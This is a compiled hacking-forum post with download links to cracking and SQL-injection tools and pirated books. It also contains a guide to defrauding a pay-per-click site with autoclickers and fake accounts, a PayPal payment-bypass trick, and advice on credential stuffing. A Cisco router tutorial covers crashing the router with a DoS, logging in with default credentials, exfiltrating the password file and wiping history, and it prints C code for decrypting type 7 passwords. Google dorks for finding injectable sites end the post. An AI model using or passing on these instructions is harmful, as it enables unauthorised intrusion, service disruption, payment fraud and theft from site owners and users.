ASTALAVISTA Security Toolbox DVD v5.0

Astalavista's Security Toolbox DVD 2008 (v5.0) is considered to be the largest and most comprehensive Information Security archive. As always we are committed to provide you with a resource for all of your security and hacking interests, in an interactive way! The Information found on the Security Toolbox DVD has been carefully selected, so that you will only browse through quality information and tools. No matter if you are a computer enthusiast, a computer geek, a newbie looking for information on "how to hack", or an IT Security professional looking for quality and up to date information for offline use or just for convenience, we are sure that you will be satisfied, even delighted by the DVD!

- Extremely comprehensive (about 2'562 Tools!)
- Very well sorted archive with detailed descriptions (276 categories!)
- Improved performance of the Security Toolbox, information has never been that easier to find

http://rapidshare.com/files/128140085/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part01.rar
http://rapidshare.com/files/128139961/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part02.rar
http://rapidshare.com/files/128140034/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part03.rar
http://rapidshare.com/files/128140037/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part04.rar
http://rapidshare.com/files/128141044/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part05.rar
http://rapidshare.com/files/128140920/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part06.rar
http://rapidshare.com/files/128140191/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part07.rar
http://rapidshare.com/files/128140134/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part08.rar
http://rapidshare.com/files/128139878/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part09.rar
http://rapidshare.com/files/128140861/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part10.rar
http://rapidshare.com/files/128140030/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part11.rar
http://rapidshare.com/files/128140011/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part12.rar
http://rapidshare.com/files/128141239/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part13.rar
http://rapidshare.com/files/128141089/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part14.rar
http://rapidshare.com/files/128140021/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part15.rar
http://rapidshare.com/files/128141019/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part16.rar
http://rapidshare.com/files/128140139/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part17.rar
http://rapidshare.com/files/128140073/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part18.rar
http://rapidshare.com/files/128140078/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part19.rar
http://rapidshare.com/files/128140019/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part20.rar
http://rapidshare.com/files/128139977/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part21.rar
http://rapidshare.com/files/128141157/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part22.rar
http://rapidshare.com/files/128140162/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part23.rar
http://rapidshare.com/files/128139879/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part24.rar
http://rapidshare.com/files/128140015/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part25.rar
http://rapidshare.com/files/128140138/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part26.rar
http://rapidshare.com/files/128140001/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part27.rar
http://rapidshare.com/files/128140013/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part28.rar
http://rapidshare.com/files/128140306/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part29.rar
http://rapidshare.com/files/128140384/ASTALABabyTBX.v5.0-NSiD_Softddl.net.part30.rar

SIPcrack - SIP Login Dumper & Hash/Password Cracker

SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol.

The tools offer support for pcap files, wordlists and many more to extract all needed information and bruteforce the passwords for the sniffed accounts.

If you don’t have OpenSSL installed or encounter any building problems try ‘make no-openssl’ to build with integrated MD5 function (which is slower than the OpenSSL implementation).

Usage

Use sipdump to dump SIP digest authentications to a file. If a login is found, the sniffed login is written to the dump file. See ’sipdump -h’ for options.

Use sipcrack to bruteforce the user password using the dump file generated by sipdump. If a password is found, the sniffed login in the dump file is updated See ’sipcrack -h’ for options.

http://www.codito.de/prog/SIPcrack-0.3pre.tar.gz

Cheating Bux .to, ITS NOT SPAM, NO REFERAL LINKS

Note: I dont post up referral links. I only post the original sites. The original website is the link above, without the spaces. I only put spaces in the links, because it comes up as "*Censored*"

Note: This is not one of those "How to make free money!" tutorials that are usually labeled as spam. These are one of those tutorials that help you in the process, and hopefully make it easier to deal with clicking ads.

Bux . to is a PPC site, literally meaning pay-per-click. You click ads, and leave them up for 30 seconds. For every ad you view, you get one cent ($0.01). Bux . to doesn't allow you to make more than one account on your computer, and repeatedly clicking ads can get tiring. This method will show you how to "cheat" bux . to.

Getting Started

Sign up with bux . to, with no referrals. You also need an account on paypal, for when you want to "cashout" from bux . to.

Autoclickers

An autoclicker allows you to automatically click ads, instead of manually clicking.

The Bux . to Autoclicker made by "mlsoftware" can get you banned, but this method will not involve that program. That program uses up a constant amount of RAM, and can be highly uneffective, as well as detected.

Instead, we are going to use firefox, in conjuction with Mozilla add-ons.

1) You will need to download these extensions:

ReloadEvery: https://addons.mozilla.org/en-US/firefox/addon/115
Greasemonkey: https://addons.mozilla.org/en-US/firefox/addon/748

2) Download one of these scripts for the "autoclicking" process:

Low Bandwidth Usage: Refreshes page every 20 sec.
Medium Bandwidth Usage: Refreshes page every 10 sec.
High Bandwith Usage: Refreshes page every 5 sec.
Insane Bandwidth Usage: Refreshes page every 2 sec.

3) Navigate to the page where the ads are displayed. There will be a box above the ads, telling you when ads are being clicked, when they're finished, and when all the ads are finished. The only thing you will have to do is leave firefox open. I suggest leaving this on overnight, or even the whole day, to click as many ads as possible; about 150 ads on average come up during the whole day.

4) *Optional*: Set reload every to 15 minutes (Click the arrow next to the reload box, and select 15m). This is for failsafe purposes. I personally do not use this, but you can if you want.

Multiple Accounts

To create multiple accounts, log off your current account if you haven't already. Then, clear your cache and your cookies. Register an account, and once you're done, clear your cache/cookies again. Repeat this process as many times as you want. I suggest making at least 10 accounts. Remember to make your referrer as your original account, so that your new accounts will earn money, and your original account will earn money too (100% referral bonus).

Hacking: the art of exploitation

This book is for the security pro or would be hacker who want's to begin to see how deep the rabbit hole really does go. There is no other book like it on the market, and I've read most of them. Jon Erickson's code included in the book all works well as designed on Linux. The author also suggests some good free Linux tools for use with the code examples including most notably a hex editor, basic dissassembler, and packet injector.
The techniques in the book are best described by a caption on its back cover, "The fundamental techniques of serious hacking." It includes major sections on programming, networking, and cryptography. All material is covered with an eye towards exploitation. Languages used in the book material consist of C, PERL, and Assembly for X86.

The techniques described in this book are fundamental to any hacker or security professional who takes their work seriously. The book is well worth the discounted amazon.com price. The material in this book is all original and cannot be found elsewhere. Each example in the programming section is truly an eye opener if you are new to code hacking. The examples in the networking and cryptography sections are relevant and fresh as well.

It is a computer security and network security book. All of the examples in the book were developed, compiled, and tested on Gentoo Linux.

http://rapidshare.com/files/27388573/Hacking-The_Art_of_Exploitation.rar.html

Exploiting Paypal order system

So you decided to purchase download software, that they require you to pay via paypal? If when the link was compiled they decided it would be much better not to encrypt the link, they just opened a nice hole for us.

1) Basicly all you want to do is open the source of the pay page then search for the keyword "return".

right click -> view source || or view -> page source

You should always use a proxy for safety but it is not really necessary, as you could always argue you wanted to buy it then decided not too.

2) you should find a value copy it and paste it into your browser.

Example:



3) you should now see a thank you page, giving you the URL to download the program!


Remember there has to be a thank you page with the url or this exploit will not work. The program can not be emailed to you by using this exploit. it just wont work.



If you find sites that allow you to use this exploit paste it in here and i will edit this post and add them here:

http://www.ramphelp.com/halfpipe.html [Patched - they use the email now]

Written by Nazim

Exploiting Software: How to Break Code

How does software break? How do attackers make software break on purpose? Why are
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
Exploiting Software is loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
This must-have book may shock you�and it will certainly educate you.Getting beyond the
script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Exploiting Software is filled with the tools, concepts, and knowledge necessary to break
software.

Download:

http://rapidshare.com/files/49900600/ESHTBTC.rar

EXPLOITING 101 - The Basics

EXPLOITING 101 - The Basics



NOTE: Some statements in here apply to beginners. If you read this and are an advanced user, you might say: "That is not true, I know a way....". Correct. But it is impossible to include every exception and technique without creating confusion. Read this essay as if you are a beginner....

NOTE 2: Some basic rules all good crackers and exploiters adhere to: Do not change, alter, or delete any info you may find on a site. This is just not done, and can actually result in prosecution if you get caught.
On your exploiting journey, you may also come across confidential information from members, such as home addresses, credit card info etc. I know I have, many times over. I even found a hole where I could have the checks of site referrals sent to my account! Never use this information to your personal gain! This will be considered theft and misuse of personal information, and can get you into serious trouble...

OK, now with that out of the way, let's start the series on Exploiting...!

EXPLOITING - THE BASICS
OK, so you are tired of bruteforcing, have spoofed a couple of sites, and have seen posts with custom passes or complete member lists...and you wanna know how... If so, this essay is for you.

This basic exploiting essay assumes you understand or master the following techniques and skills with respect to website security:
- Basic HTML
- Brute forcing
- Proxy use
- Basic URL handling
- Basic website structures
- Basic Spoofing
- Good AD skills or similar

But most importantly, you need a good brain and have a sincere interest in website security. Exploiting takes a lot of time and requires research on a regular basis. On the other hand, the rewards are well worth the effort in my opinion!

When trying to test the security of websites, you can gain access in the following manners, listed in order of technical difficulty:
1. Guess passwords
2. Brute force attacks
3. Spoof the site
4. Get and decrypt passfiles or logs
5. Using scripts to add passes
6. Get admin access (via telnet or browser)
7. Hack the server via telnet

As you can see in the list above, exploiting is really nothing more than increasing your chances of getting access. Guessing passwords...to bruteforcing...to decrypting passfiles or logs...you increase your chances of getting a working pass with less effort!

HTACCESS and HTPASSWD
Since there are excellent tuts on this already, I am not going to spend a lot of time on this. One question I see a lot from newbies is that they "can not locate the htpasswd"....

A few notes on htaccess and htpasswd:
- htaccess only sometimes shows the dir to the htpasswd (or passwd or different name)
- the chances of getting this file are slim, as this vulnerability is well-known out there and most webmasters have denied you access, hidden the file, or placed the file on their home dir.

For the fans, here is some more detailed info on the subject I found:
In order to find the .htpasswd (or interpret the .htaccess) you need to understand the difference between the web root and the system root.

The AuthUserFile is specified in terms of the system root. That is, the directory structure you would see if you were actually logged into the computer through a terminal.

When a web browser accesses a machine, it is through a web server. The web server is configured so that the browser will start at some specific directory in the machine. I refer to that as the web root. It is specified in the web server configuration file, off in some directory you can't browse to.

So, lets say that the web root is set to /home/users/www.site.com/www. When you surf to http:/www.site.com/ you find yourself in the machine directory /home/users/www.site.com/www (but nothing really tells you that), and if there is an index.html there, you will display it.

So lets say that the web root is set as above, and that the .htaccess contains the line:



code:
--------------------------------------------------------------

AuthUserFile /home/users/www.site.com/www/hidden/.htpasswd

--------------------------------------------------------------
(or something similar)

Applying what I said above, you would find the .htpasswd at:


code:
--------------------------------------------------------

http://www.site.com/hidden/.htpasswd

--------------------------------------------------------


Since the web root is /home/users/www.site.com/www. You still may not be able to read it because it might be forbidden through some other method, say only accessible from certain IP addresses, or . files are not accessible through their web server.

Now, lets say the .htaccess said:


code:
--------------------------------------------------------------

AuthUserFile /home/users/abc.com/hidden/.htpasswd

--------------------------------------------------------------

Now, there is no way we can get to it since the web root puts us in home/users/www.site.com/hidden/www and we are well past the days when you could back up above a web root in an Apache web server.

If ../ worked, we would be in luck, since we could specifyhttp://www.site.com/hidden/.htpasswd
This used to work, or the unicoded version worked, or the double unicoded version worked, or quotes worked, or unicoded quotes, etc., etc. Not so anymore....

Our only hope, when the .htpasswd is not on the web root, is to find another exploit that will allow us to access files. Such things exist but are hard to find, so read on....

SO NOW WHAT?
Well, as you tried to get the passfile looking for it in the obvious locations, and failed...maybe there are other ways of obtaining it....

Using AD or another security scanner, you can start looking for so-called vulnerabilities. This means testing the website for security, and trying to find ways into the site. How does this work, you ask? We need a tool to test the security...

For these essays, I will be talking about a tool called WebSiteFinder, or WSF in short. Written by Wolfman, this is a great tool, in my opinion. AD or Passcraft can do the same, so use whatever you feel comfortable with. If you start out, use AD.

To make these tools really effective, you need an exploit list. This is a list of basic paths that will be tested for possible vulnerabilities or access against the website. AD offers a basic exploit list, at least the older versions did. Exploit lists can be found all over the web, but please realise these are very basic, and some of the holes (=vulnerabilities) they have in it, are old and will not work anymore on most sites.

HOW TO MAKE YOUR OWN EXPLOIT LIST
Really good exploiters or crackers will not share their lists with you. The reason: Once some exploits are made public, chances are the holes will be discovered quickly and thus closed! And that is a bummer.

So you have to build your own list. How, you ask? Here are a few tips.

1. ANALYZE, THINK, STUDY, BE CREATIVE
First place to start, is to analyze your current exploit list. What makes sense, and what does not. What paths do you understand? Why do you think that particular path is a vulnerability, and if you came accross it, how would you use it? If you don't know, ask on a forum via PM, there are many people around that can and will help you. Moreover, read up on security sites (better get used to it), such as packetstorm, securiteam, etc.

NOTE: It is no use to just try exploits on sites if you don't understand what you are doing. The results can be very bad. You could, unwillingly, do damage to the site!

2. KEEP YOUR EYES ON THE SCREEN
Look at directory trees of sites you visit. Try to go up and down in levels in the dir to possibly find more holes...copy these to your exploit list.

3. STATS and LOGS
These are KING in my book. Why? Stats show the requests made to a website, and some stats list all the requests....including those of someone trying to exploit the site. The paths that this person tried may not have worked on the site, but heh, copy them to your exploit list, they may come in handy for other sites! Access logs show the same thing...moreover, they might tell you alot about the server, home server (FTP logs), usernames, and the basic website structure.

INTERMEZZO: "What to do with the usernames?"
This is a question I get a lot. Someone has seen the stats, and now has a list of usernames. Now what? Well, half the battle is won! Remember the statement I made about increasing your chances in getting access? This is it! Proceed in two ways:
1. Use the usernames and one of your wordlists to do a BF attack
2. Match the usernames to working combos you have. There are tools for this, and try to see if the combos work. Many users use the same password for different sites...see where I am getting at?

4. GOOGLE, GOOGLE, GOOGLE!
I love google. I embrace googling. You should too. Make googling your hobby! Type in a path or exploit, and see what you get, you will be surprised! It will lead you to access logs, vulnerability reports, cool sites, etc. Whatever you find and think is useful, copy to your exploit list...

Exploiting Cisco Systems

--------------------------
Exploiting Cisco Systems
(Even From Windows!)



Warning:
DO NOT use this to damage cisco systems, or gain unauthorized access to systems. This tutorial is just something to
use for educational purposes. Only use this information in a legal way (the hacker wargames for instance), and do
not damage or destroy anything. This is a step-by-step guide on how a series of proven cisco exploits can be used to
gain access. If you get caught breaking into a cisco router, or screw the system up, you can interrupt hundreds of
internet clients, and cost thousands of dollars, so only use this when you are allowed!! Using this the wrong way
will get you into a lot of trouble.


----------------------------------
Table of Contents:
----------------------------------
Before you start:

- What is an IP address?

- What is an ISP?

- What is a TCP/IP packet?

- How to spoof your IP

- How to use Telnet

- How to use HyperTerminal

- How to use Ping

- How to use TraceRoute

- How to use a proxy server

-------------------------------------

- Section 1: why hack a cisco router?

- Section 2: how to find a cisco router

- Section 3: how to break into a cisco

- Section 4: how to break the password

- Section 5: how to use a cisco router

-----------------------------------

Stuff you'll need to know BEFORE you start:

-----------------------------------

What is an IP address?

IP stands for Internet Protocol, IP addresses are used by other computers to identify computers that connect to
them. This is how you can be banned from IRC, and how they can find your ISP. IP addresses are easily obtained, they
can be retrieved through the following methods:

-you go to a website, your IP is logged

-on IRC, anyone can get your IP

-on ICQ, people can get your IP, even if you have the option set "do not show ip"
they can still get it

-if you are connected to someone, they can type "systat", and see who is connected to them

-if someone sends you an email with IP-logging java, they can also get your IP address

There are many more ways of obtaining IP addresses, including using back-door programs such as Sub7 or NetBus.

------------------------------------

What is an ISP?

ISP stands for Internet Service Provider, they are the ones that give you the internet. You connect to one everytime
you dial-up and make a connection. People can find your ISP simply by running a traceroute on you (traceroute is
later explained). It will look something like this:

tracert 222.222.22.22

Tracing route to [221.223.24.54]
over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target's isp
10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.

-----------------------------------

What is a TCP/IP packet?

TCP/IP stands for Transmission Control Protocol and Internet Protocol, a TCP/IP packet is a block of data which is
compressed, then a header is put on it and it is sent to another computer. This is how ALL internet transfers occur,
by sending packets. The header in a packet contains the IP address of the one who originally sent the packet. You
can re-write a packet and make it seem like it came from anyone!! You can use this to gain access to lots of systems
and you will not get caught. You will need to be running Linux or have a program which will let you do this. This
tutorial does not tell you to use this on a Cisco router, but it does come in handy when hacking any system. If
something goes wrong when you try to hack a system, you can always try this...

------------------------------------

How to spoof your IP:

Find a program like Genius 2 or DC IS, which will let you run IdentD. This will let you change part of your
computer's identity at will! Use this when you get banned from some IRC chat room.... you can get right back in! You
can also use it when you are accessing another system, so it logs the wrong id...

------------------------------------

How to use telnet:

You can open telnet simply by going to your Start Menu, then to Run, and typing in "telnet".

Once you have opened telnet, you may want to change some features. Click on Terminal>Preferences. Here you can
change the buffer size, font, and other things. You can also turn on/off "local echo", if you turn local echo on,
your computer will show you everything you type, and the other computer you are connected to will show you aswell.
So you may get something like this;

You type "hello", and you get
hhelelollo

This is because the information has bounced back and got scrambled with what you typed. The only reason I would use
this is if the machine does NOT return what you are typing.

By default, telnet will connect to a system on the telnet port, which is port 23. Now you will not always want to
connect to port 23, so when you go to connect, you can change the port to maybe 25, which is the port for mail
servers. Or maybe port 21, for FTP. There are thousands of ports, so make sure you pick the right one!

----------------------------------

How to use HyperTerminal:

HyperTerminal allows you to open a "server" on any port of your computer to listen for incoming information from
specified computers. To use this, go to
Start>Programs>Accessories>Communications>HyperTerminal. First you will need to select the connection, pick "TCP/IP
Winsock", and then put in the computer to communicate with, and the port #. You can tell it to listen for input by
going to Call>Wait for Call. Now the other computer can connect to you on that port, and you can chat and transfer
files.

----------------------------------

How to use Ping:

Ping is easy, just open the MS-DOS prompt, and type "ping ip.address", by default it will ping 3 times, but you can
type

"ping ip.address -t"

Which will make it ping forever. To change the ping size do this:

"ping -l (size) ip.address"

What ping does is send a packet of data to a computer, then sees how long it takes to be returned, which determines
the computer's connection speed, and the time that it takes for a packet to go back and forth (this is called the
"trip time"). Ping can also be used to slow down or even crash a system if the system is overloaded by ping floods.
Windows 98 crashes after one minute of pingflooding (it's connections buffer is overflown - too many connections are
registered, and so Windows decides to take a little vacation).
A ping flood attack takes a lot of bandwidth from you, and you must have more bandwidth than your target (unless
the target is a Windows 98 box and you have an average modem, that way you'll knock it down after approximately a
single minute of ping flooding). Ping flooding isn't effective against stronger targets, unless you have quite a few
evil lines to yourself, and you have control over a few bandwidth-saavy hosts that can ping flood your target as
well.
Note: DOS's -t option doesn't do a ping flood, it just pings the target continously, with intervals from one ping to
another. In every Unix or Linux distribution, you can use ping -f to do a real pingflood. Actually ping -f is
required if you want your distribution to be POSIX-compliant (POSIX - Portable Operating System Interface based on
uniX), otherwise it's not a real Unix/Linux distribution, so if you have an OS that calls itself either Unix or
Linux, it has the -f switch.

----------------------------------

How to use TraceRoute:

To trace your connection (and see all the computer's between you and a target), just open the MS-DOS prompt, and
type "tracert ip.address" and you will see a list of computers, which are between you and the target computer.

You can use this to determine if there are firewalls blocking anything. And will also allow you to determine
someone's ISP (internet service provider).

To determine the ISP, simple look at the IP address before the last one, this should be one of the ISP's routers.

Basically, this is how traceroute works - a TCP/IP packet has a value in it's header (it's in the IP header. If you
don't know what this means, then ignore it and continue reading, it's not that crucial) called TTL, which stands
for Time To Live. Whenever a packet hops (travels through a router) it's TTL value is decreased by one. This is just
a countermeasure against the possibility that something would go wrong and a packet would ricochet all around the
net, thus wasting bandwidth.
So when a packet's TTL reaches zero, it dies and an ICMP error is sent back to the sender.
Now, traceroute first sends a packet with a TTL value of 1. The packet quickly returns, and by looking at the
sender's address in the ICMP error's header, the traceroute knows where the packet has been in it's first hop. Then
it sends a packet with a TTL value of 2, and it returns after the second hop, revealing it's identity. This goes on
until the packet reaches it's destination.

Now isn't that fun? :-)

----------------------------------

How to use a proxy server:

Do a search on the web for a proxy server which runs on the port of your choice. Once you find one, connect to it
with either telnet or hyperterminal and then connect to another computer through the proxy server. This way the
computer at the other end will not know your IP address.

----------------------------------

Section 1: why hack a cisco router?

You probably are wondering.. why hack into a cisco router?

The reason being is that they are useful when it comes to breaking into other systems...

Cisco routers are very fast, some with 18 T1 connections on one system, and they are very flexible and can be used
in DoS attacks or to hack other systems since most of them run telnet.

They also have thousands of packets going through them at any one time, which can be captured and decoded... A lot
of cisco routers are also trusted systems, and will let you have a certain amount of access to other computers on
it's network.

----------------------------------

Section 2: finding a cisco router

Finding a cisco router is a fairly easy task, almost every ISP will route through at least one cisco router. The
easiest way to find a cisco router is to run a traceroute from dos (type "tracert" and then the IP address of
anyone's computer), you can trace pretty much anyone because the trace will show all of the computer systems between
your computer and their computer. One of these systems will probably have the name "cisco" in it's name. If you find
one like this, copy down it's IP address.

Now you have the location of a cisco router, but it may have a firewall protecting it, so you should see if it's
being blocked by pinging it a couple times, if you get the ping returned to you, it might not be blocked. Another
way is to try to access some of the cisco router's ports, you can do this simply by using telnet, and opening a
connection to the router on port 23.. If it asks for a password, but no username, you are at the router, but if it
wants a username aswell, you are probably at a firewall.

Try to find a router without a firewall, since this tutorial is on the routers and not how to get past the
firewalls. Once you're sure you have found a good system, you should find a proxy server which will allow you to use
port 23, this way your IP will not be logged by the router.

---------------------------------

Section 3: how to break into a cisco router

Cisco routers running v4.1 software (which currently is most of them) will be easily disabled. You simply connect to
the router on port 23 through your proxy server, and enter a HUGE password string, something like;

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

Now wait, the cisco system might reboot, in which case you can't hack it because it is offline.. But it will
probably freeze up for a period of 2-10 minutes, which you must use to get in.

If neither happens, then it is not running the vulnerable software, in which case you can try several DoS attacks,
like a huge ping. Go to dos and type "ping -l 56550 cisco.router.ip -t", this will do the same trick for you.

While it is frozen, open up another connection to it from some other proxy, and put the password as "admin", the
reason for this is because by default, this is the router's password, and while it is temporarily disabled, it will
revert to it's default state.

Now that you have logged in, you must acquire the password file! The systems run different software, but most will
have a prompt like "htl-textil" or something, now type "?" for a list of commands, you will see a huge list of
commands, somewhere in there you will find a transfer command, use that to get the password file of admin (which is
the current user) and send it to your own IP address on port 23. But before you do this, set up HyperTerminal to
wait for a call from the cisco router. Now once you send the file, HyperTerminal will ask you if you want to accept
the file that this machine is sending you, say yes and save it to disk. Logout.

You are now past the hardest part, give yourself a pat on the back and get ready to break that password!

------------------------------

Section 4: breaking the password

Now that you have acquired the password file, you have to break it so you can access the router again. To do this,
you can run a program like John the Ripper or something on the password file, and you may break it.

This is the easiest way, and the way i would recommend. Another way would be to try and decrypt it. For this you
will need some decryption software, a lot a patience, and some of the decryption sequences.

Here is a sequence for decrypting a cisco password, you have to compile this in linux:

#include
#include

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)
return(-1);

seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}

if(strlen(enc_pw) != i)
return(-1);
}

dec_pw[++i / 2] = 0;

return(0);
}

usage()
{
fprintf(stdout, "Usage: %s -p \n", pname);
fprintf(stdout, " %s

\n", pname);

return(0);
}

main(argc,argv)
int argc;
char **argv;

{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}

if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;

case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n", passwd);
break;

default:
fprintf(stderr, "%s: unknow option.", pname);
}

return(0);
}

if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}

while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;

fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;

if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);

if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}

if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);
}
}
}

If you do not have Linux, then the only way to break the password is to run a dictionary or brute-force attack on
the file with John the Ripper or another password-cracker.

-------------------------------

Section 5: using the router

To use this wonderful piece of technology, you will have to be able to connect to it, use a proxy if you do not want
your IP logged. Once you have logged in, you'll want to disable the history so no one can look at what you were
doing, type in "terminal history size 0". Now it won't remember anything! Type "?" for a list of all of the router's
commands, and you will be able to use most of them.

These routers usually have telnet, so you can use telnet to connect to other systems, (like unix boxes) and hack
into them. It also is equipped with ping and traceroute, which you can use to trace systems or do DoS attacks. You
may also be able to use it to intercept packets, but i do not recommend this, as it will not always work, and may
get you noticed....

---------------------------------

If you don't hack a cisco your first time, don't worry... you probably won't do it the first time, or even the
second. It takes practice and patience. This is just to show you how... And make sure you are going after something
that is LEGAL.

--------------------------
Exploiting Cisco Systems
(Even From Windows!)

Triton

This program is what is known as an "exploiter". It can be used to probe websites for possible vulnerabilities based on user-customisable pre-defined lists. This is a follow up to the popular -=[Triton 0.3]=- program with a great number of improvements.

This program should only be used against sites where you have the permission to do so.

Written By Rhino

Download:

http://project2025.com/Triton.zip

XSS & SQL inject Addon tools for Firefox Browser

Exploit-Me is a set of Firefox plugins to test for reflected Cross-Site Scripting and SQL Injection vulnerabilities in web applications.

The tools are designed to be lightweight, extensible and easy to use.

http://securitycompass.com/exploitme.shtml

Bsqlbf V2 - Blind Sql Injection Brute Forcer Tool

There are quite a lot of SQL Injection Tools available and now there is one more to add to the stable for testing - Bsqlbf V2, which is a Blind SQL Injection Brute Forcer.

The original tool (bsqlbfv1.2-th.pl) was intended to exploit blind sql injection against a mysql backend database, this new version supports blind sql injection against the following databases:

* MS-SQL
* MY-SQL
* PostgreSQL
* Oracle

It supports injection in string and integer fields. The feature which separates this tool from all other sql injection tools is that it supports custom SQL queries to be supplied with the -sql switch.

It supports 2 modes of attack:

1. Type 0: Blind SQL Injection based on True And Flase response
2. Type 1: Blind SQL Injection based on True And Error Response(details)

You can download Bsqlbf V2 here:

http://bsqlbf-v2.googlecode.com/files/bsqlbf-v2.1.zip

Total Spoof version 1.44

This is my favorite spoofer, i used to use it way back. All you do it enter the ref and tar and save it to your list then click spoof site and there it loads.


Features

Editing
TotalSpoof gives you complete control and flexibility on managing you spoof list.

Delete Duplicates
Deletes all duplicates in the currently load list.

Favorites
Allows you to mark your favorite spoofs for easy location, Your favorite spoofs are displayed with this image .

Sorting your List
This feature is useful if you have a large list, simply by clicking on the column headers will sort you list or you may want to sort by your favorites then a right mouse click in the list.

Load/Save/Export/Import
Allows you to have multiple lists and flexibility in your spoofing environment.

QuickSpoof
if you want to test a spoof then use this feature first and if the spoof is successful then you have the option to add the new spoof to your list for saving.

Spoof validating/scanner
This is not 100% more like 90% successful, but what it attempts to do is visit each site in your list and scans the resulting page for common errors like 'access denied', you have the option to delete bad sites as they are found or to mark the site with the dead icon .


Screen Shots


http://rapidshare.com/files/96758068/TotalSpoof144.rar

password: www.imafia.net

CForce V1.00, Cracking-Too

In my opinion the best crackingtool.
It can handle basic, form and some strongbox logins.

http://rs385tl2.rapidshare.com/files/110120925/CForce_1.00.rar

Password: by_WaKo

AccessDiver

You can find this program at www.accessdiver.com

The deface-Sql imjection

The deface-Sql imjection

http://rs376tl2.rapidshare.com/files/127530532/SQL_Injection_Tool_v2.1a.rar

Sql Injection Dorks

allinurl:.php?id=
allinurl:*.php?id=
